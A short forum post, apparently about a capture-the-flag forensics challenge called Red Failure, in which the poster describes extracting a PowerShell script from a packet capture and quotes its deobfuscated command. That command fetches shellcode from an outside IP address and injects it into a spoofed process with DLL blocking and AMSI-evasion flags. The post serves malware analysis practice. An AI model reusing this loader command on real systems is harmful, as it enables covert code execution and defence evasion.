Let’s discuss Red Failure. Please do not share any flags or writeups.
Exported http objects from the pcap file
Inspected the ps script
PS C:\> ${c`MD}
currentthread /sc:http://147.182.172.189:80/9tVI0 /password:z64&Rx27Z$B%73up /image:C:\Windows\System32\svchost.exe /pid:notepad /ppid:explorer /dll:msvcp_win.dll /blockDlls:True /am51:True
That’s it with RE Corner - scdbg download